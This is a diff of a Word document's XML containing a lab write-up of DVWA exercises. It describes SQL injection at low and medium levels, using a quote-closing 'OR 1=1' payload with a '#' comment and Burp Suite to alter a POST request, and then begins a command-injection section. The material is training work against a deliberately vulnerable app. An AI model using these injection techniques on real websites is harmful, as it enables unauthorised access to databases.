-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:t xml:space="preserve">od attacks the database by tricking them to returning sensitive data. Websites have become more interactive than before. Therefore, the user is expected to manipulate the programming language code. For example, when the user is typing something in a web input, the website is ready to take that value to execute it to the website. This is a chance for the attacker to input malicious code that might affect the website in a bad way. One of the SQLi tricks is to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This method attacks the database by tricking them to returning sensitive data. Websites have become more interactive than before. Therefore, the user is expected to manipulate the programming language code. For example, when the user is typing something in a web input, the website is ready to take that value to execute it to the website. This is a chance for the attacker to input malicious code that might affect the website in a bad way. One of the SQLi tricks is to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">force the database to return all the information by putting “1=1” in the </w:t>
       </w:r>
@@ -2445,6 +4858,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>sql</w:t>
       </w:r>
@@ -2452,6 +4867,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> query. 1=1 means that the query is always true, so it returns all the data. </w:t>
       </w:r>
@@ -2460,21 +4877,35 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">DVWA Exercise: </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>SQLi – Low level</w:t>
       </w:r>
     </w:p>
@@ -2482,12 +4913,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673DF754" wp14:editId="584685EB">
@@ -2543,17 +4978,23 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">The website here expects a number as input to return data that are true to that specific number. However, we can manipulate the query </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">but first we need to understand it. </w:t>
       </w:r>
@@ -2562,12 +5003,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="003E3913" wp14:editId="69CCD31C">
@@ -2623,11 +5068,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Simple query that we can easily adjust by entering a number as it asks, then close the quotation mark then type “OR 1=1” as it would return everything as true. Then finish the query with # to comment anything comes after.</w:t>
       </w:r>
@@ -2636,12 +5085,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAC5BF8" wp14:editId="38BB565A">
@@ -2697,12 +5150,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Indeed</w:t>
       </w:r>
@@ -2710,6 +5167,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> the database returned all the data because of the 1=1 logic.</w:t>
       </w:r>
@@ -2718,33 +5177,44 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">SQLi – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Medium</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> level</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SQLi – Medium level</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EEA093D" wp14:editId="05E31782">
@@ -2800,13 +5270,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">The difference here is that we are not given input to enter true logic with the input. We are just asked to select the number from a drop down. The idea for how to do this is still exactly like the old one. However, we just need to find a different way to put the logic onto the database. </w:t>
       </w:r>
     </w:p>
@@ -2814,17 +5287,23 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>For this I would choose Burp Suite to help me manipulate the POST request</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -2833,11 +5312,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">I just need to send the POST request to Burp Suite then send it to repeater to execute my logic there. </w:t>
       </w:r>
@@ -2846,19 +5329,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34277C00" wp14:editId="7473AFFC">
@@ -2914,11 +5403,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">As you can see it is </w:t>
       </w:r>
@@ -2926,6 +5419,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>similar to</w:t>
       </w:r>
@@ -2933,18 +5428,24 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> the previous </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>one,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> we only had to find a way to manipulate the POST request. </w:t>
       </w:r>
@@ -2953,77 +5454,95 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc113747832"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
         <w:t>Command Injection</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Command Injection</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Low</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> level</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
+      <w:bookmarkEnd w:id="11"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Command Injection – Low level</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">We are presented with an input to enter any </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -3031,6 +5550,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> address to PING.</w:t>
       </w:r>
@@ -3039,28 +5560,35 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63076C66" wp14:editId="2A1ACF1F">
             <wp:extent cx="5725160" cy="1296035"/>
@@ -3115,23 +5643,31 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Let us</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> see the code behind this function: </w:t>
       </w:r>
@@ -3140,33 +5676,43 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0260C6BD" wp14:editId="4BA1C130">
@@ -3222,11 +5768,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">This function basically tells the program to go to the </w:t>
       </w:r>
@@ -3234,6 +5784,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>cmd</w:t>
       </w:r>
@@ -3241,6 +5793,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> and ping the target (entered </w:t>
       </w:r>
@@ -3248,6 +5802,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -3255,6 +5811,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>).</w:t>
       </w:r>
@@ -3263,11 +5821,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
